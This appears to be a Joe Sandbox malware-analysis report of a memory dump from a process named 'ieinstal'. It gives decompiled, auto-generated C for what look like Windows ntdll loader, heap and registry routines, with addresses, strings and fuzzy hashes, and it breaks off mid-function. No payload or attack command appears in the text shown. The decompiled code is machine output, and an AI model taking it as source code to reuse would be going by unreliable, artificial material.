0x00000000
0x1f07bdc8
0x1f07bdce
0x1f07bde4
0x1f07bde8
0x1f07bdef
0x1f07be04
0x1f07be08
0x1f07be0e
0x1f07be2e
0x1f07be36
0x00000000
0x00000000
0x00000000
0x1f07be0e
0x1f07bdea
0x1f07bdea
0x1f07bdea
0x1f07bde8
0x1f07bdce
0x1f07bdc6
0x1f07bd88
0x1f07bd88
0x1f07bd88
0x1f07bd8a
0x1f07bd8a
0x1f07bd86
0x1f07bd36
0x1f07be43
0x1f07be45
0x1f07be48
0x1f07be48
0x1f07be4f
0x1f07be5d
0x1f07be5d
0x1f07be68

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 1F07BD45
@, xrefs: 1F07BD71
PreferredUILanguages, xrefs: 1F07BD92

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 090de0e30358d1262ee3932e1c1f6d2a3976d45d0fe7663c00f16e8c6d421d97
Instruction ID: 617460cf756f52b4800b23d2a4ff90d56d1e6f406c03a6d0255ea92bcd18b2a2
Opcode Fuzzy Hash: 090de0e30358d1262ee3932e1c1f6d2a3976d45d0fe7663c00f16e8c6d421d97
Instruction Fuzzy Hash: A94163B1D00649ABDB11CF94C850FEEB7F9AF44704F05426AEB45E7284EB74AA44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1F053CD4 Relevance: 3.9, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E1F053CD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				short _t35;
				short _t36;
				intOrPtr _t38;
				void* _t54;
				signed char* _t55;
				signed char* _t61;
				signed char _t65;
				signed int _t76;
				void* _t81;
				signed char* _t83;
				void* _t86;

				_push(0x6c);
				_push(0x1f09cf60);
				E1F017C40(__ebx, __edi, __esi);
				_t81 = __ecx;
				_t65 = 0x3a;
				 *(_t86 - 0x50) = _t65;
				_t35 = 0x3c;
				 *((short*)(_t86 - 0x4e)) = _t35;
				 *(_t86 - 0x4c) = L"LdrpResValidateFilePath Enter";
				_t36 = 0x38;
				 *((short*)(_t86 - 0x58)) = _t36;
				 *(_t86 - 0x56) = _t65;
				 *(_t86 - 0x54) = L"LdrpResValidateFilePath Exit";
				if(E1EFD3C40() == 0) {
					_t66 = 0x7ffe0385;
				} else {
					_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t66 & 0x00000001) == 0) {
					_t61 = 0x7ffe0384;
				} else {
					_t54 = E1EFD3C40();
					_t61 = 0x7ffe0384;
					if(_t54 == 0) {
						_t55 = 0x7ffe0384;
					} else {
						_t55 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_t66 = _t86 - 0x50;
					E1F04FC01(_t86 - 0x50,  *_t55 & 0x000000ff);
				}
				if(_t81 != 0) {
					 *((intOrPtr*)(_t86 - 4)) = 0;
					_t38 = E1EFC34C0(_t81);
					 *((intOrPtr*)(_t86 - 0x7c)) = _t38;
					 *((intOrPtr*)(_t86 - 4)) = 0xfffffffe;
					if(_t38 == 1 || _t38 == 2 || _t38 == 6) {
						if(E1EFE1BA0(_t66, _t81, _t86 - 0x60, 0, 0) != 0) {
							 *((intOrPtr*)(_t86 - 0x78)) = 0x18;
							 *((intOrPtr*)(_t86 - 0x74)) = 0;
							 *((intOrPtr*)(_t86 - 0x6c)) = 0x40;
							 *((intOrPtr*)(_t86 - 0x70)) = _t86 - 0x60;
							 *((intOrPtr*)(_t86 - 0x68)) = 0;
							 *((intOrPtr*)(_t86 - 0x64)) = 0;
							_push(_t86 - 0x44);
							_push(_t86 - 0x78);
							_t76 = E1F002D80();
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t86 - 0x5c)));
							if(_t76 >= 0) {
								asm("sbb edi, edi");
								_t76 =  ~( *(_t86 - 0x24) & 0x10) & 0xc000000d;
							}
						} else {
							_t76 = 0xc000003a;
						}
						goto L18;
					} else {
						goto L10;
					}
				} else {
					L10:
					_t76 = 0xc000000d;
					L18:
					_t83 = 0x7ffe0385;
					if(E1EFD3C40() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t83 & 0x00000001) != 0) {
						if(E1EFD3C40() != 0) {
							_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E1F04FC01(_t86 - 0x58,  *_t61 & 0x000000ff);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0x10));
					return _t76;
				}
			}

0x1f053cd4
0x1f053cd6
0x1f053cdb
0x1f053ce0
0x1f053ce4
0x1f053ce5
0x1f053ceb
0x1f053cec
0x1f053cf0
0x1f053cf9
0x1f053cfa
0x1f053cfe
0x1f053d02
0x1f053d10
0x1f053d23
0x1f053d12
0x1f053d1b
0x1f053d1b
0x1f053d2b
0x1f053d5a
0x1f053d2d
0x1f053d2d
0x1f053d32
0x1f053d39
0x1f053d4b
0x1f053d3b
0x1f053d44
0x1f053d44
0x1f053d50
0x1f053d53
0x1f053d53
0x1f053d61
0x1f053d6f
0x1f053d73
0x1f053d78
0x1f053d7b
0x1f053d85
0x1f053d9f
0x1f053dab
0x1f053db2
0x1f053db5
0x1f053dbf
0x1f053dc2
0x1f053dc5
0x1f053dcb
0x1f053dcf
0x1f053dd5
0x1f053de4
0x1f053deb
0x1f053df7
0x1f053df9
0x1f053df9
0x1f053da1
0x1f053da1
0x1f053da1
0x00000000
0x00000000
0x00000000
0x00000000
0x1f053d63
0x1f053d63
0x1f053d63
0x1f053e21
0x1f053e21
0x1f053e2d
0x1f053e38
0x1f053e38
0x1f053e41
0x1f053e4a
0x1f053e55
0x1f053e55
0x1f053e61
0x1f053e61
0x1f053e6b
0x1f053e77
0x1f053e77

Strings

LdrpResValidateFilePath Exit, xrefs: 1F053D02
@, xrefs: 1F053DB5
LdrpResValidateFilePath Enter, xrefs: 1F053CF0

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: def7a5c436a8814e7c1fbed4f17b8859c80e9a84336100b0832a538ef4cb2aa7
Instruction ID: d6551f502feda2bb0466655c4bcacbaf92458c291a9cc5ef90c23fb8e378ef22
Opcode Fuzzy Hash: def7a5c436a8814e7c1fbed4f17b8859c80e9a84336100b0832a538ef4cb2aa7
Instruction Fuzzy Hash: 0D41E236905394CBDB12CBE4E850B9DB7FAEF45704F25056ADD01EF2A1E7B4A901CB20

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD0ACE Relevance: 3.8, Strings: 3, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E1EFD0ACE(void* __ebx, unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t29;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t27 = __ebx;
				_t40 = __edx;
				_t39 = _t28;
				if( *0x1f0b6960 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E1EFBB910();
						} else {
							E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E1EFBB910();
						__eflags =  *0x1f0b5da8;
						if(__eflags == 0) {
							E1F07FC95(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t29 =  *_t38;
						__eflags = _t29;
						if(_t29 == 0) {
							_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
							__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
							L20:
							return E1EFD0D69(_t39, _t38, 0, _t13, _t40);
						}
						_t38 = _t29;
					}
					goto L20;
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x1efd0ace
0x1efd0ada
0x1efd0adc
0x1efd0ade
0x1f02521a
0x1f02521c
0x1f025222
0x1f025228
0x1f02522c
0x1f02524b
0x1f025250
0x1f02522e
0x1f025243
0x1f025248
0x1f025256
0x1f02525b
0x1f025260
0x1f025268
0x1f025271
0x1f025271
0x1f025268
0x1f02521c
0x1efd0ae4
0x1efd0aec
0x1f02527d
0x1f02528a
0x1f02528a
0x1f02528d
0x00000000
0x00000000
0x1f025282
0x1f025284
0x1f025286
0x1f025294
0x1f025294
0x1f025295
0x00000000
0x1f02529b
0x1f025288
0x1f025288
0x00000000
0x1efd0af2
0x1efd0af2
0x1efd0af8
0x1efd0afa
0x1efd0b04
0x1efd0b07
0x1efd0b03
0x1efd0b03
0x1efd0b09
0x1efd0b09
0x00000000
0x1efd0afe

Strings

HEAP: , xrefs: 1F02524B
HEAP[%wZ]: , xrefs: 1F02523E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 1F025256

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 5065ec509baffb34cdc01e607d5c3f35d8f5c93925de3bf5a434408c53dc23d4
Instruction ID: 1e5026382c3b45d89678e8e2262a5f279faa26425bc2cdfef6c0be25c578add9
Opcode Fuzzy Hash: 5065ec509baffb34cdc01e607d5c3f35d8f5c93925de3bf5a434408c53dc23d4
Instruction Fuzzy Hash: 0511DA353152429FE718D625C8B4BAAB7D6FF81750F58475AEC07CB280EB32EC48D664

Uniqueness

Uniqueness Score: -1.00%

Function 1F041D5E Relevance: 3.8, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E1F041D5E(char __ecx) {
				char _v8;
				char _v12;
				signed char _t9;
				void* _t11;
				char _t20;

				_t9 =  *0x1f0b37c0; // 0x0
				_t20 = __ecx;
				if((_t9 & 0x00000003) != 0) {
					E1F03E692("minkernel\\ntdll\\ldrinit.c", 0x79d, "LdrpInitializationFailure", 0, "Process initialization failed with status 0x%08lx\n", __ecx);
					_t9 =  *0x1f0b37c0; // 0x0
				}
				if((_t9 & 0x00000010) != 0) {
					asm("int3");
				}
				_t11 = E1F040371( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38, 0x1efa11f8);
				if( *0x1f0b5a9c == 0) {
					_v8 = _t20;
					_push( &_v12);
					_push(1);
					_push( &_v8);
					_push(0);
					_push(1);
					_push(0xc0000145);
					_t11 = E1F004020();
				}
				return _t11;
			}

0x1f041d63
0x1f041d6c
0x1f041d70
0x1f041d89
0x1f041d8e
0x1f041d93
0x1f041d98
0x1f041d9a
0x1f041d9a
0x1f041dac
0x1f041db8
0x1f041dbd
0x1f041dc0
0x1f041dc1
0x1f041dc6
0x1f041dc7
0x1f041dc9
0x1f041dcb
0x1f041dd0
0x1f041dd0
0x1f041dd7

Strings

Process initialization failed with status 0x%08lx, xrefs: 1F041D73
minkernel\ntdll\ldrinit.c, xrefs: 1F041D84
LdrpInitializationFailure, xrefs: 1F041D7A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 76ba8e85807dbd77948c976dab2d43136ca7059a14931cdd9bdf4041393aa442
Instruction ID: 02a5e351bad4bd1ff593202bc47e3d4c05f37f6d934ff1fe44d789648e3bf11b
Opcode Fuzzy Hash: 76ba8e85807dbd77948c976dab2d43136ca7059a14931cdd9bdf4041393aa442
Instruction Fuzzy Hash: 9DF0C2B9A00324ABE720D6488C92FD937A8EF80B64F604055FE057B281D6B0B900C694

Uniqueness

Uniqueness Score: -1.00%

Function 1F089ED2 Relevance: 2.8, Strings: 2, Instructions: 348
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E1F089ED2(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v36;
				char _v40;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				char _v104;
				signed int _v108;
				signed int _v120;
				void* __ebx;
				signed int _t130;
				signed int _t133;
				void* _t134;
				signed int _t140;
				signed int _t144;
				signed int _t150;
				signed int _t162;
				intOrPtr* _t163;
				signed int _t171;
				signed int _t194;
				void* _t197;
				signed int _t200;
				signed int _t211;
				signed int _t212;
				signed int _t229;
				signed int _t236;
				signed int _t245;
				signed int _t248;
				void* _t252;
				void* _t256;
				signed int _t258;
				unsigned int* _t260;

				_t260 = __ecx;
				_v64 = __edx;
				_t245 = 0;
				_v100 = _v100 & 0;
				_v80 = 0;
				_push( *((intOrPtr*)(__ecx + 4)));
				_push( *((intOrPtr*)(__ecx)));
				_push(0);
				_t197 = 0x14;
				_t194 = E1F0894F9(_t197, _t197);
				if(_t194 == 0) {
					L63:
					__eflags = _v100;
					if(_v100 != 0) {
						_push(_t260[1]);
						_push( *_t260);
						_push(0x8000);
						E1F088845( &_v100,  &_v96);
					}
					goto L65;
				} else {
					_t229 = _a4;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t248 = 0;
					_v92 = 0;
					if(( *(__ecx + 0xc) & 0x04000000) != 0 && 0x1fffff - (_t229 - 0x00000001 & 0x001fffff) < _t229 >> 2) {
						_t248 = 1;
						_v92 = 1;
					}
					while(1) {
						_t200 = 0;
						_v76 = 0;
						if(_t248 == 0) {
							__eflags =  *_t260 >> 8 - 2;
							if( *_t260 >> 8 < 2) {
								__eflags = (_t229 & 0x000fffff) - 1 - 0xfefff;
								if((_t229 & 0x000fffff) - 1 <= 0xfefff) {
									_t200 = 1;
									__eflags = 1;
									_v76 = 1;
								}
							}
							_v84 = _v84 & 0x00000000;
							_t130 = (_t200 << 0xc) + _t229;
							__eflags = _t130;
						} else {
							_v84 = 0x200000;
							_t130 = _t229 - (_t229 - 0x00000001 & 0x001fffff) + 0x1fffff;
						}
						_v96 = _t130;
						if(_t130 < _t229) {
							break;
						}
						_t133 = _t260[3] & 0x40000000;
						asm("sbb edi, edi");
						_t252 = ( ~_t133 & 0x0000003c) + 4;
						if(_t133 != 0) {
							_push(0);
							_push(0x1c);
							_push( &_v60);
							_push(3);
							_push(_t260);
							_push(0xffffffff);
							if(E1F002BE0() < 0 || (_v56 & 0x00000060) == 0 || _v60 != _t260) {
								E1F085FED(0, _t260, 1, _v56, 0, 0);
								_t252 = 4;
							}
						}
						_t134 = E1F088009( &_v100,  &_v96, _v84, 0x2000, _t252,  *_t260, _t260[1]);
						_t277 = _t134;
						if(_t134 < 0) {
							_t114 =  &_v100;
							 *_t114 = _v100 & 0x00000000;
							__eflags =  *_t114;
							break;
						} else {
							_push(_t260[1]);
							_push( *_t260);
							E1F0896CB(_v100,  &_v68, _t277,  &_v88);
							 *_v80 = _t260;
							_t140 = _a4 + 0xfff >> 0xc;
							_v84 = _t140;
							_v96 = _t140 << 0xc;
							if(E1EFF68EA(_t260[0x21] + _t260[0x14] << 0xc, _t260,  &(_t260[6])) == 0) {
								break;
							}
							_v96 = 0x1000;
							if(_v100 == 0) {
								__eflags = _a8 & 0x00000002;
								if((_a8 & 0x00000002) != 0) {
									_v96 = 0x40001000;
								}
							} else {
								_t241 = _v92;
								_v96 = 0x20001000;
								_t46 = _t241 - 1; // -1
								_v92 = _v92 + 0x1fffff - (_t46 & 0x001fffff);
							}
							_t144 = _t260[3] & 0x40000000;
							asm("sbb edi, edi");
							_t256 = ( ~_t144 & 0x0000003c) + 4;
							if(_t144 != 0) {
								_push(0);
								_push(0x1c);
								_push( &_v40);
								_push(3);
								_push(_t260);
								_push(0xffffffff);
								if(E1F002BE0() < 0 || (_v36 & 0x00000060) == 0 || _v40 != _t260) {
									E1F085FED(0, _t260, 1, _v36, 0, 0);
									_t256 = 4;
								}
							}
							if(E1F088009( &_v108,  &_v92, 0, _v96, _t256,  *_t260, _t260[1]) >= 0) {
								__eflags = _v100;
								if(_v100 != 0) {
									__eflags = _a8 & 0x00000002;
									if((_a8 & 0x00000002) != 0) {
										E1F008F40(_v108, 0, _a4);
									}
								}
								 *((intOrPtr*)(_t194 + 0xc)) = _v108;
								_t150 = _v84 + _v84;
								_t211 = ( *(_t194 + 0x10) & 0x00000ffd | _v80 << 0x0000000c) & 0xfffffffd | _t150;
								 *(_t194 + 0x10) = _t211;
								asm("bsf eax, [esp+0x14]");
								 *(_t194 + 0x10) = (_t150 << 0x00000002 ^ _t211) & 0x000000fc ^ _t211;
								 *((short*)(_t194 + 0xc)) = (_v80 << 0xc) - _v72;
								_t87 =  &_a8;
								 *_t87 = _a8 & 0x00000001;
								__eflags =  *_t87;
								if( *_t87 == 0) {
									L1EFD2330( &(_t260[0x10]),  &(_t260[0x10]));
								}
								_t236 =  &(_t260[0x11]);
								__eflags =  *(_t236 + 4) & 0x00000001;
								_t212 =  *_t236;
								if(( *(_t236 + 4) & 0x00000001) != 0) {
									__eflags = _t212;
									if(_t212 == 0) {
										_t212 = 0;
										__eflags = 0;
									} else {
										_t212 = _t212 ^ _t236;
									}
								}
								_t258 =  *(_t236 + 4) & 1;
								_v92 = 0;
								__eflags = _t212;
								if(_t212 == 0) {
									L52:
									L1EFDEB80(_t236, _t212, _v92, _t194);
									__eflags = _a8;
									if(_a8 == 0) {
										E1EFD24D0( &(_t260[0x10]));
									}
									asm("cdq");
									asm("lock xadd [eax], ecx");
									asm("lock xadd [eax], ecx");
									_t245 = _v108;
									_t194 = 0;
									_v108 = _v108 & 0;
									_t162 = E1EFD3C40();
									__eflags = _t162;
									if(_t162 == 0) {
										_t163 = 0x7ffe0388;
									} else {
										_t163 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
									}
									__eflags =  *_t163 - _t194;
									if( *_t163 == _t194) {
										L65:
										return _t245;
									} else {
										E1F07DAAF(_t194, _t260, _t245, _v104);
										L61:
										__eflags = _t194;
										if(_t194 != 0) {
											E1F089629(_t194,  *_t260, _t260[1]);
										}
										goto L63;
									}
								} else {
									while(1) {
										__eflags = _v108 - ( *(_t212 + 0xc) & 0xffff0000);
										if(_v108 < ( *(_t212 + 0xc) & 0xffff0000)) {
											goto L46;
										}
										_t171 =  *(_t212 + 4);
										__eflags = _t258;
										if(_t258 == 0) {
											L44:
											__eflags = _t171;
											if(_t171 != 0) {
												L50:
												_t212 = _t171;
												continue;
											}
											L45:
											_v92 = 1;
											goto L52;
										}
										__eflags = _t171;
										if(_t171 == 0) {
											goto L45;
										}
										_t171 = _t171 ^ _t212;
										__eflags = _t171;
										goto L44;
										L46:
										_t171 =  *_t212;
										__eflags = _t258;
										if(_t258 == 0) {
											L49:
											__eflags = _t171;
											if(_t171 == 0) {
												L51:
												_v92 = 0;
												goto L52;
											}
											goto L50;
										}
										__eflags = _t171;
										if(_t171 == 0) {
											goto L51;
										}
										_t171 = _t171 ^ _t212;
										__eflags = _t171;
										goto L49;
									}
								}
							} else {
								if(_v100 == 0) {
									break;
								}
								_push(_t260[1]);
								_t248 = 0;
								_push( *_t260);
								_v100 = 0;
								_push(0x8000);
								E1F088845( &_v108,  &_v104);
								_v120 = _v120 & 0;
								_t229 = _a4;
								continue;
							}
						}
					}
					_t245 = _v80;
					goto L61;
				}
			}

0x1f089ee0
0x1f089ee2
0x1f089ee6
0x1f089ee8
0x1f089eec
0x1f089ef0
0x1f089ef3
0x1f089ef5
0x1f089ef8
0x1f089f00
0x1f089f04
0x1f08a2b2
0x1f08a2b2
0x1f08a2b7
0x1f08a2b9
0x1f08a2c0
0x1f08a2c6
0x1f08a2cb
0x1f08a2cb
0x00000000
0x1f089f0a
0x1f089f0a
0x1f089f16
0x1f089f17
0x1f089f18
0x1f089f19
0x1f089f1a
0x1f089f1b
0x1f089f24
0x1f089f28
0x1f089f3a
0x1f089f3b
0x1f089f3b
0x1f089f3f
0x1f089f3f
0x1f089f41
0x1f089f47
0x1f089f6a
0x1f089f6c
0x1f089f76
0x1f089f7b
0x1f089f7f
0x1f089f7f
0x1f089f80
0x1f089f80
0x1f089f7b
0x1f089f84
0x1f089f8e
0x1f089f8e
0x1f089f49
0x1f089f4c
0x1f089f5e
0x1f089f5e
0x1f089f90
0x1f089f96
0x00000000
0x00000000
0x1f089f9f
0x1f089fa8
0x1f089fad
0x1f089fb2
0x1f089fb4
0x1f089fb6
0x1f089fbc
0x1f089fbd
0x1f089fbf
0x1f089fc0
0x1f089fc9
0x1f089fe6
0x1f089fed
0x1f089fed
0x1f089fc9
0x1f08a005
0x1f08a00a
0x1f08a00c
0x1f08a299
0x1f08a299
0x1f08a299
0x00000000
0x1f08a012
0x1f08a012
0x1f08a01d
0x1f08a024
0x1f08a02d
0x1f08a040
0x1f08a045
0x1f08a054
0x1f08a05f
0x00000000
0x00000000
0x1f08a06a
0x1f08a072
0x1f08a094
0x1f08a098
0x1f08a09a
0x1f08a09a
0x1f08a074
0x1f08a074
0x1f08a07d
0x1f08a085
0x1f08a08e
0x1f08a08e
0x1f08a0a5
0x1f08a0ae
0x1f08a0b3
0x1f08a0b8
0x1f08a0ba
0x1f08a0bc
0x1f08a0c2
0x1f08a0c3
0x1f08a0c5
0x1f08a0c6
0x1f08a0cf
0x1f08a0ec
0x1f08a0f3
0x1f08a0f3
0x1f08a0cf
0x1f08a10f
0x1f08a145
0x1f08a14a
0x1f08a14c
0x1f08a150
0x1f08a15b
0x1f08a160
0x1f08a150
0x1f08a16a
0x1f08a180
0x1f08a185
0x1f08a187
0x1f08a18a
0x1f08a19b
0x1f08a1a9
0x1f08a1ad
0x1f08a1ad
0x1f08a1ad
0x1f08a1b1
0x1f08a1b7
0x1f08a1b7
0x1f08a1bc
0x1f08a1bf
0x1f08a1c3
0x1f08a1c5
0x1f08a1c7
0x1f08a1c9
0x1f08a1cf
0x1f08a1cf
0x1f08a1cb
0x1f08a1cb
0x1f08a1cb
0x1f08a1c9
0x1f08a1d5
0x1f08a1d8
0x1f08a1dd
0x1f08a1df
0x1f08a220
0x1f08a227
0x1f08a22c
0x1f08a230
0x1f08a236
0x1f08a236
0x1f08a23f
0x1f08a24f
0x1f08a25a
0x1f08a25e
0x1f08a262
0x1f08a264
0x1f08a268
0x1f08a26d
0x1f08a26f
0x1f08a281
0x1f08a271
0x1f08a27a
0x1f08a27a
0x1f08a286
0x1f08a288
0x1f08a2d0
0x1f08a2d8
0x1f08a28a
0x1f08a292
0x1f08a2a2
0x1f08a2a2
0x1f08a2a4
0x1f08a2ad
0x1f08a2ad
0x00000000
0x1f08a2a4
0x00000000
0x1f08a1e1
0x1f08a1e9
0x1f08a1ed
0x00000000
0x00000000
0x1f08a1ef
0x1f08a1f2
0x1f08a1f4
0x1f08a1fc
0x1f08a1fc
0x1f08a1fe
0x1f08a217
0x1f08a217
0x00000000
0x1f08a217
0x1f08a200
0x1f08a200
0x00000000
0x1f08a200
0x1f08a1f6
0x1f08a1f8
0x00000000
0x00000000
0x1f08a1fa
0x1f08a1fa
0x00000000
0x1f08a207
0x1f08a207
0x1f08a209
0x1f08a20b
0x1f08a213
0x1f08a213
0x1f08a215
0x1f08a21b
0x1f08a21b
0x00000000
0x1f08a21b
0x00000000
0x1f08a215
0x1f08a20d
0x1f08a20f
0x00000000
0x00000000
0x1f08a211
0x1f08a211
0x00000000
0x1f08a211
0x1f08a1e1
0x1f08a111
0x1f08a116
0x00000000
0x00000000
0x1f08a11c
0x1f08a11f
0x1f08a125
0x1f08a12b
0x1f08a12f
0x1f08a134
0x1f08a139
0x1f08a13d
0x00000000
0x1f08a13d
0x1f08a10f
0x1f08a00c
0x1f08a29e
0x00000000
0x1f08a29e

Strings

`, xrefs: 1F08A0D1
`, xrefs: 1F089FCB

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
Instruction ID: 05340fb768756dae64849a1030c0f61b264192a5a1bd02cf23dd7acef2810b83
Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
Instruction Fuzzy Hash: F2C1F631A08342ABE724CF28C841B9BBBE5FFC4714F044A2DF996CA690E775E585CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF5BE0 Relevance: 2.7, Strings: 2, Instructions: 241
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1EFF5BE0(intOrPtr _a4, char* _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, unsigned int _a24, unsigned int* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				short _v48;
				char _v52;
				unsigned int _v56;
				intOrPtr _v60;
				signed int _t72;
				signed int _t81;
				intOrPtr _t89;
				void* _t90;
				unsigned int* _t91;
				unsigned int* _t102;
				intOrPtr _t106;
				short _t113;
				unsigned int _t117;
				void* _t119;
				intOrPtr* _t120;
				unsigned int _t123;
				unsigned int _t124;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t131;
				short _t134;
				signed int _t137;
				signed int _t139;
				void* _t140;
				void* _t141;
				void* _t148;

				_t72 = _a16;
				_t113 = 0;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_t134 = 0;
				if(_t72 != 0) {
					if(_t72 == 1) {
						goto L1;
					}
					_t81 = 0xc00000f1;
					L14:
					return _t81;
				}
				L1:
				_t148 =  *0x1f0b6618 - _t113; // 0x1
				if(_t148 == 0) {
					_v28 = 0x18;
					_v20 = 0x1ef91750 + _t72 * 8;
					_push( &_v28);
					_push(0x20019);
					_v24 = _t113;
					_push( &_v52);
					_v16 = 0x40;
					_v12 = _t113;
					_v8 = _t113;
					_t137 = E1F002AB0();
					if(_t137 != 0xc0000034) {
						if(_t137 < 0) {
							goto L10;
						}
						E1F005050(_t119,  &_v36, _a4);
						_v32 = _v60;
						_v28 =  &_v44;
						_push( &_v36);
						_push(0x20019);
						_v36 = 0x18;
						_push( &_v56);
						_v24 = 0x40;
						_v20 = _t113;
						_v16 = _t113;
						_t137 = E1F002AB0();
						if(_t137 == 0xc0000034) {
							goto L3;
						}
						if(_t137 < 0) {
							goto L10;
						}
						_t93 = _a8;
						if(_a8 == 0) {
							_t93 = L"TargetPath";
						}
						E1F005050(_t119,  &_v36, _t93);
						_t41 = _a24 + 0x10; // 0x10
						_t140 = _t41;
						if(_t140 >= _a24) {
